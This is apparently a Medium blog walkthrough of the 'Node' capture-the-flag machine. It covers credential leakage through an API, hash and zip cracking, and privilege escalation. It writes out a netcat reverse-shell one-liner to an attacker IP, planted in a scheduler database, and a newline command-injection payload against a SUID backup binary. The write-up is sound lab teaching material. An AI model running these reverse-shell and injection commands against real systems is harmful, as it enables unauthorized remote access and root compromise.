Node: 1 | Vulnhub Walkthrough

Dot Dot Slash
Aug 24, 2018 · 6 min read

Node is a vulnerable machine, originally created for HackTheBox platform, designed by Rob Carr. Node has several privilege escalation paths and is more of a CTF style machine.

Level: Intermediate

Arp-scan or netdiscover can be used to discover the leased IP address.

Image for post
Image for post
Discover target IP address using arp-scan

Port scans using nmap revealed a web application running on port 3000 and an SSH service. Website running on the target made no sense to me. I wasn’t able to figure out why this application existed in the first place. Nevertheless there was a login page in the application.

Image for post
Image for post
Image for post
Image for post
Detailed nmap scan
Image for post
Image for post
Main site

Enumeration and Initial Foothold

Image for post
Image for post
Check source code for hints
Image for post
Image for post
API call exposing user credentials
Image for post
Image for post
Detecting hash type as SHA-256
Image for post
Image for post
Cracked two hashes online
Image for post
Image for post
Logged into the application as tom

However, there was nothing of interest in the application from the context of a standard user. On checking the response from the API, we can be assured that none of the compromised users were admins.

On further enumeration, I was able to discover another API call to /api/users. And I was able to discover an additional hash, belonging to an admin user. Using the same online tool I cracked it.

Image for post
Image for post
Hash discovered for admin account
Image for post
Image for post
Cracked the hash
Image for post
Image for post
Logged in as admin user

Admin login allowed me to download some sort of backup which was 3MB+ in size. At first the downloaded file didn’t make much sense to me. It looked like base64 data on checking the contents. The decoded file was a zip archive which required a password for extraction. I used fcrackzip along with rockyou.txt word-list in Kali to discover the password. On unzipping the archive, I got the backup of the web application.

Image for post
Image for post
Decode and extract zip file
Image for post
Image for post
Crack the zip password using fcrackzip
Image for post
Image for post
Extract the zip archive to retrieve the backup files

From the extracted files, I got the MongoDB connection string which had the password for mark user. I tried to SSH using the same credentials. However there was no user hash present in mark’s home folder.

Image for post
Image for post
Password for mark
Image for post
Image for post
SSH access as mark

Expressway to Root

Image for post
Image for post
Enumerating the box
Image for post
Image for post
Rooted using kernel exploit

More Enumeration and an insecure scheduler

Image for post
Image for post
Another Node.JS application on the box
Image for post
Image for post
JavaScript code of the scheduler app

So the scheduler app is connecting to the scheduler database using mark’s credentials. In nut shell, the application is periodically connecting to the database to retrieve the ‘cmd’ value from the ‘tasks’ collection. The ‘cmd’ value is executed using the exec function and the value is then removed from the database. So all we need to do is to write our payload onto the DB in the tasks collection. I wrote the reverse shell payload using netcat(nc had no -e support).

I got access as tom and the user hash was present in his home folder. e1156acc3574e04b06908ecf76be91b1

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 443 >/tmp/f
Image for post
Image for post
Write the reverse shell payload to DB
Image for post
Image for post
Reverse shell as tom

Custom backup function

So the syntax required(check the source code for clarity) for invoking the backup binary is /usr/local/bin/backup -q <backup_key> <directory_to_backup>.

Image for post
Image for post
Backup key hard coded in the application
Image for post
Image for post
portion of code invoking the backup binary
Image for post
Image for post
Suid bit set for backup binary

Trying to backup /root or /etc folders will return an ASCII art instead of the backup. So I performed a strings analysis on the binary for clarity. Now with the string analysis data in hand, I can explain how the backup binary works.

  1. First it checks for the valid access token.
  2. For location /root and /etc it has a hardcoded base64 output.
  3. If the location is not /etc or /root it will create a temporary file on the /tmp folder.
  4. Then the specific location is zipped using the following command. /usr/bin/zip -r -P magicword %s %s > /dev/null. One of the %s is going to pass on the directory we passed as input to the backup binary. Any output is redirected to /dev/null.
  5. The archive file is then base64 encoded and printed onto the terminal.
Image for post
Image for post
String analysis on the backup binary using strings command

Now this looks like a typical command injection scenario but indeed a very tricky one. I needed to get around the /dev/null redirection which will terminate all output. If I could pass on some command to the backup binary in quotes, it will pass the command onto the internal commands without immediate execution.

I used newline character to get around the /dev/null hurdle. My newline is going to break the single command into three commands. Third command ls >/dev/null will get executed only after /bin/bash thereby bypassing the restriction.

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /s"$(echo 'dds\n/bin/bash\nls')"
Image for post
Image for post
Root access through command injection

Root flag can be read from /root folder. 1722e99ca5f353b362556a62bd5e6be0

Well, that was a hard root to come by. Node was a great machine. Yet another CTF style machine but I loved the privilege escalation path.

egghunter

My experiments on Vulnhub

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store